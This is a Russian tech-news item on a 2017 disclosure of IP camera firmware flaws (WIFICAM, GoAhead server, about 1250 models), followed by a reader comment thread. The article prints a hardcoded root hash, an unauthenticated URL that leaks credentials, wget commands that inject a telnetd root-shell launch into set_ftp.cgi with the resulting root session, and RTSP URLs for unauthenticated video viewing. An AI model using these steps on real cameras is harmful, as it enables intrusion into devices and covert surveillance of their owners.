В результате изучения прошивки камеры Wireless IP Camera (P2P) WIFICAM была выявлена (https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0...) возможность удалённого доступа к устройству с правами root, используя жестко прописанный в прошивке пароль. Более детальный разбор показал, что в прошивке также присутствуют и другие уязвимости, позволяющие выполнить свой код с правами root, в том числе обнаружена уязвимость в http-сервере GoAhead, который используется многими другими производителями IP-камер.Так как камера Wireless IP Camera (P2P) WIFICAM построена на типовой платформе, на основе которой выпускаются многие другие модели IP-камер, некоторые уязвимости проявляются и в моделях других производителей. В сумме проблемам оказались подвержены около 1250 различных моделей камер. Сканирование сети через севис Shodan выявило (https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f...) более 185 тысяч уязвимых устройств. Миллионы камер во внутренних подсетях потенциально уязвимы для атак через облачную инфраструктуру.
Среди уязвимых отмечены некоторых модели камер 3com, 7Links, A4Tech, APKLINK, AQUILA, AVACOM, Acromedia, Agasio, Airsight, Alecto, Allnet, Apexis, Atheros, Bionics, Chinavasion, D-Link, Dericam, EST, EasyCam, EasyN, Elro, EyeCam, Foscam, GoAhead, Heden, iView ,ICam, Kogan, LifeTech, Logitech, Maginon, Mediatech, Netcam, Pixpo, Polariod, Provision, Pyle, Scricam, skylink, Skytronic, SmartEye, Sricam, Sricctv, StarCam, Sumpple, Suneyes, Supra+Space, Swann, Techview, Tenvis, Vantech, Vstarcam, Wanscam, Wansview, X10 и т.д.
Выявленные уязвимости:- В прошивке определён фиксированный пароль root ("root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh") и по умолчанию запущен сервис "telnetd". Для входа с правами root достаточно подобрать пароль по хэшу и подключиться при помощи telnet;
- В прошивке сохранён закрытый RSA-ключ для Apple Production iOS Push Services (/system/www/pem/ck.pem);
- Утечка информации в http-сервере GoAhead, позволяющая получить информацию об учётных записях. Параметры доступа сохраняются в файлах system.ini и system-b.ini, на которые присутствуют символические ссылки из директории для отдачи данных в Web. Из-за ошибки, в отличии от cgi-скриптов, требующих аутентификации, к файлам можно обратиться без аутентификации, указав пустые логин и пароль. Например, для получения параметров входа достаточно запросить файл "http://192.168.1.1/system.ini?loginuse&loginpas";
- Через манипуляциею со скриптом set_ftp.cgi, предназначенным для настройки доступа по FTP, можно выполнить произвольную команду с правами root через подстановку shell-конструкции "$(...)". Например, для запуска процесса telnetd для входа без пароля можно выполнить:
$ wget -qO- 'http://192.168.1.1/set_ftp.cgi?next_url=ftp.htm&loginuse=adm...$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
$ wget -qO- 'http://192.168.1.1/ftptest.cgi?next_url=test_ftp.htm&loginus...'
$ telnet 192.168.1.107 25
Trying 192.168.1.107...
Connected to 192.168.1.107.
Escape character is '^]'./ # id
uid=0(root) gid=0Комбинируя данную уязвимость с утечкой параметров аутентификации, можно обеспечить удалённый вход на камеру с правами root. Для упрощения проведения атаки и организации обратного канала связи для обхода межсетевого экрана подготовлен универсальный эксплоит (https://pierrekim.github.io/advisories/expl-goahead-camera.c).
- Возможность просмотра передаваемой камерой видеоматериалов без аутентификации. Для просмотра достаточно обратиться к TCP-порту 10554 по протоколу RTSP, например "vlc rstp://192.168.1.1:10554/tcp/av0_1" или "vlc rstp://192.168.1.1:10554/tcp/av0_0";
- По умолчанию камера обеспечивает работу с облачными сервисами, что позволяет использовать мобильные приложения для управления камерой, размещённой за транслятором адресов или межсетевым экраном. По умолчанию камера периодически отправляет UDP-пакеты к сервисам www.baidu.com, openapi.xg.qq.com и ряду жестко прошитых IP-адресов. Протокол взаимодействия с облачными сервисами достаточно простой и не использует шифрование. В качестве идентификатора для подключения к камере через облачную сеть используется серийный номер, что позволяет зная или подобрав серийный номер, подключиться к камере во внутренней подсети, к которой нет прямого доступа из интернет.
Дополнительно можно отметить выявленную (http://seclists.org/fulldisclosure/2017/Mar/7) другими исследователями уязвимость (https://ipvm.com/reports/dahua-backdoor?code=bash) в CCTV и IP-камерах компании Dahua Techology. Уязвимость позволяет внешнему неаутентифицируемому атакующему загрузить содержимое базы с именами и паролями пользователей устройства, в том числе учётной записью администратора. Атака сводится к загрузке файла с учётными записями и входу на устройство с полученными параметрами администратора. Рабочий эксплоит планируется опубликовать 5 апреля, дав пользователям время на установку обновления (http://www.dahuasecurity.com/en/us/uploads/Dahua%20Tech...).
URL: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0...
Новость: http://www.opennet.dev/opennews/art.shtml?num=46175
Богата земля китайская дырявыми устройствами
Да это вполне ожидаемо, если учесть, что так называемые эмбеддеры, разрабатывающие данные устройства, сидят под вантузом, запуская gcc.exe и ld.so.exe. Отсутствие личной гигиены - одна из основных проблем.
может по тому что ленятся модифицировать референс код ?
Да и дорого это.. для устройств за 10 баксов.
Лучше бы они этого не делали, ибо см. выше.
> ld.so.exeo_O
ГЫ-ксперт в наличии =)
А россейская вечно недовольными коментаторами-бездельниками...
А почему д этого комментарии не отправлялись?
Наверное боялись, что работники гетиша dahua сольют o dahua.
> Dahua Techology
> DahuaSecurity.comДаже добавить нечего.
>http-сервере GoAhead
>GoAhead
>уязвимость
А есть для таких камер аналоги опенврт?
Raspberry или другой SoC + хоть родная камера, хоть вебка.
В принципе, что-то можно нашаманить даже на Arduino с её родной камерой, но вот насколько оно рабочее — я пока не знаю.
> А есть для таких камер аналоги опенврт?Хозяйке на заметку: https://packages.altlinux.org/vargus (чтоб хоть это не изобретать).
Я не понимать, как этот vargus можно установить на видеокамеру?Вопрос был о прошивке для камер с целью получения однородной инфраструктуры, при покупке устройств разных вендоров.
> Вопрос был о прошивке для камерНе, это не прошивка...
Удаленный вход по 192.168.х.х?Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!
> Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!Вы даже не представляете, сколько их...
Смерть приватности: как камеры слежения становятся игрушкой хакеров
http://www.bbc.com/russian/features-38929977
> Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!убьешься ты, наоборот, городить защищенную сеть для "своих" ip-камер.
В случае, конечно, если тебе доверят что-то посложнее localhost. Мы для этого и только для этого запускали у себя ipv6, совершенно не от хорошей жизни.И прятать видео с камер, на минуточку, _наблюдения_, установленных в общественных местах (то есть не в офисном сортире, а на воротах, на автозаправке, да хоть на внешнем периметре) под табличками "ведется видеонаблюдение", смысла совершенно нет. Кроме вот одного ньюанса, да, что делают эти прошивки - китайские рукожопы.
>> Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!
> убьешься ты, наоборот, городить защищенную сеть для "своих" ip-камер.«Сеть для своих камер», простите, должна быть локальной и приезжать видео с камер на ваш сервер видеонаблюдения должно по локалке.
А с видеосервером уже городите что хотите.
А то, по логике «убьешься городить защищенную сеть для ip-камер» — надо все 127.0.0.1 машины мира за отдельную плату выставить в Сеть и потом убиваться их защищать?
IP для камеры — это просто для того, чтобы не использовать карты видеозахвата с 64-ми RCA сосками и медью обхватом полметра.
Зачем просовывать камеру дальше 192.168/24???
Затем, что это может быть куча расположенных в различных местах/городах/странах объектов. И, как правильно заметили, прятать там зачастую нечего.Ну да, можно VPN нагородить, но зачем?
Например, затем, чтобы злоумышленник, планирующий ограбление склада, не мог провести разведку и спланировать свои действия.
Да, у меня параноя и синдром вахтёра. Как будто это что-то плохое.
Оценивать надо... Подозреваю, что оно того не окупит. По нынешним временам злоумышленнику провести съёмку самостоятельно - абсолютно не проблема, и с копеечными затратами. И чем дальше - тем проще.Насчёт плохое или нет - опять же, считать надо.
>Зачем просовывать камеру дальше 192.168/24???192.168.0.0/16 Ыгсперт Д,Б! :-)))
>>Зачем просовывать камеру дальше 192.168/24???
> 192.168.0.0/16 Ыгсперт Д,Б! :-)))24, кловун, 24.
>>Зачем просовывать камеру дальше 192.168/24???
> 192.168.0.0/16Зачем вся /16-то?
>>>Зачем просовывать камеру дальше 192.168/24???
>> 192.168.0.0/16
> Зачем вся /16-то?потому что CIDR 192.168/24 немножко invalid ? думаю, что именно на это намекали. и шоб не гадать предпоследний октет предположили, что иксперт имел ввиду именно /16
>>>>Зачем просовывать камеру дальше 192.168/24???
>>> 192.168.0.0/16
>> Зачем вся /16-то?
> и шоб не гадать предпоследний октетЯ прочёл как any практически на автомате. :)
> «Сеть для своих камер», простите, должна быть локальнойкому должна - админу локалхоста? Целых две камеры, одна в домофоне, вторая в сортире?
> А то, по логике «убьешься городить защищенную сеть для ip-камер» — надо все 127.0.0.1
> машины мира за отдельную плату выставить в Сеть и потом убиваться их защищать?они во-первых и так в сети - через наты, cloud management (о котором ты можешь даже не знать), те же upnp, всюдупролезающий 624 и т д.
Во-вторых, это перестали делать не потому, что кто-то, кроме чайников "убьется защищать", а потому что адреса в основном достались нужным людям (не надо повторять сказок об их "исчерпании").> Зачем просовывать камеру дальше 192.168/24???
затем, что оно не то что в /24, а в /8 может не поместиться. Особенно если эту сеть хоть как-то сегментировать (опять таки не из идиотской хакеробоязни, а потому, что по другому такие сети не строят) К тому же они умеют мультикаст, поэтому, внезапно, могут без спросу обнаруживаться весьма далеко от своего сегмента (и пакетики ходят, в пределах инфраструктуры, если специально мер не принять - привет, dlink)
Сюрприз, да, что такие сети (и именно камерные - как раз вполне распространенный массовый клиент) бывают, никогда больше /24 не видел?
Дело в том, что они не в курсе про то что они в интернете видны. Проблема в скрвисе UPnP который осуществляет проброс 81 порта на внешний интерфейс. Собственно в нем вся проблема и есть. Ну а вторая проблема это конечно невнимательность к своей домашней сети и маломальски кривые настройки роутеров.
> Дело в том, что они не в курсе про то что они
> в интернете видны. Проблема в скрвисе UPnP который осуществляет проброс 81
> порта на внешний интерфейс.И кто же дарит им услуги DNS???
Где это место??? Дайте два!
Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится, ты ставишь роутер и думаешь, ну да мне для компа нужны такие настройки, а тут камера которая в локалке берёт и пробивает себе через UPnP канальчик, а то и другими хитрыми способами :)
> Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится,
> ты ставишь роутер и думаешь, ну да мне для компа нужны
> такие настройки, а тут камера которая в локалке берёт и пробивает
> себе через UPnP канальчик, а то и другими хитрыми способами :)( вплоть до коннекта к ней через wifi соседа ;) )
> Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится,
> ты ставишь роутер и думаешь, ну да мне для компа нужны
> такие настройки, а тут камера которая в локалке берёт и пробивает
> себе через UPnP канальчик, а то и другими хитрыми способами :)Хто платит за DNS??? Почему мне не бесплатно, а им нахаляву??? :(
> Хто платит за DNS??? Почему мне не бесплатно, а им нахаляву??? :(потому что ты поленился погуглить дальше первых двух строчек, а там уже действительно затрахались и начали собирать абонентку?
Хинт: каждый юзер волшебного японского средства от админо-полицейского файрвольного поноса, автомагически, пополняет собой некий японский dns, например. Если не успел отключить до первого тестового запуска вне закрытого окружения.
А я не так давно ржал, что последнем в фильме Форсаж хакают камеры.
Еще от части напомнило игру watch dogs (кажется так называется)
как правило установщики этих камер по всей нашей стране, люди неквалифицированные и недалекие. грамотные специалисты конечно же есть, но их очень мало, и они дорогие, поэтому работодатели жмут их себе нанимать, и превлекают только если уж прижмет сильно сильно.поэтому и стоят понапиханные везде из за психических расстройств у начальства, эти камеры и регистраторы, с тем что пришло из коробки. и стоять будут, пока конечно они не сгорят.
Я в шоке от кол-ва зондов одновременно, на любой вкус у такого внушительного кол-ва производителей.
> Я в шоке от кол-ва зондов одновременно, на любой вкус у такого
> внушительного кол-ва производителей.Никто не предполагает, что существуют мурзилы, прокидывающие камеры в Интернет.
Производители уверены в том, что их видеокамеры сдают сигнал на серверы наблюдения по ЛОКАЛКЕ.
> Производители уверены в том, что их видеокамеры сдают сигнал на серверы наблюдения
> по ЛОКАЛКЕ.Если бы даже это было и так (а это не так, см. документацию любой IP-камеры), что, давать кому угодно из локалки рута — нормально, что ли?
Сэр, это старая традиция подоконников!
Неправда. Все производители камер видеонаблюдения как раз и расхваливают фичу удаленного наблюдения за происходящим дома. Картинки во всех рекламных буклетах.
rtsp может всё таки в VLC открывать?
(real time streaming protocol)
> rtsp может всё таки в VLC открывать?
> (real time streaming protocol)Не тут как выяснилось RTSP не мапит локальный сервис UPnP так что только HTTP.
IoT во все поля
> IoT во все поляПока что просто демка.
можно подсматривать как набирают пароли в танчики
а где сам пароль?
а где ссылки на интересные стримы?
на дваче
> Server not found
> Firefox can't find the server at 2ch.ru.
Goodnight, sweet prince.
НСБ!
Сколько-сколько? А почему в DNS_е через дорогу не продают ни одной?Посоветуйте IP-рацию. Нучжно чтобы она устанавливала контакт с роутером по Wi-Fi. На роутере поднят сервер Mumble. В момент, когда человек тыкает по кнопке, на всех устройтвах воспроихводится что он говорит.
Только у них через интернет
https://play.google.com/store/apps/details?id=smile.m1project
>Посоветуйте IP-рацию.
>На роутере поднят сервер Mumble.Экий ты затейник. Пожалуй, послежу за веткой — вдруг кто чего дельного присоветует? А то тоже подобное искал, но ничего лучше самопала на одноплатнике или софтины на Андроид-девайсе не придумал.
> Сколько-сколько? А почему в DNS_е через дорогу не продают ни одной?
> Посоветуйте IP-рацию. Нучжно чтобы она устанавливала контакт с роутером по Wi-Fi. На
> роутере поднят сервер Mumble. В момент, когда человек тыкает по кнопке,
> на всех устройтвах воспроихводится что он говорит.вы ТЗ не туда отправили надо в китай слать там все бракоделы )))
А подсоветуйте какой софт к этим "широко распространённым" камерам, чтобы можно было ими вертеть, ночной/дневной режим переключать и микрофон юзать? А то у них либо надо ставить какой-то шлак для IE (что уже абсурдно), либо ставить прилагу из плеймаркета гуглового на смартфон. В остальных вариантах оный функционал не работает
шлак под IE работает как надо, и микрофон и динамики, и практически всё остальное
Нет. Нормально, из того что опробовано, работает только андроидное приложение.
У beward'a вроде есть подобные приложения
Как эксплоит-то запустить, Бэтмэны ?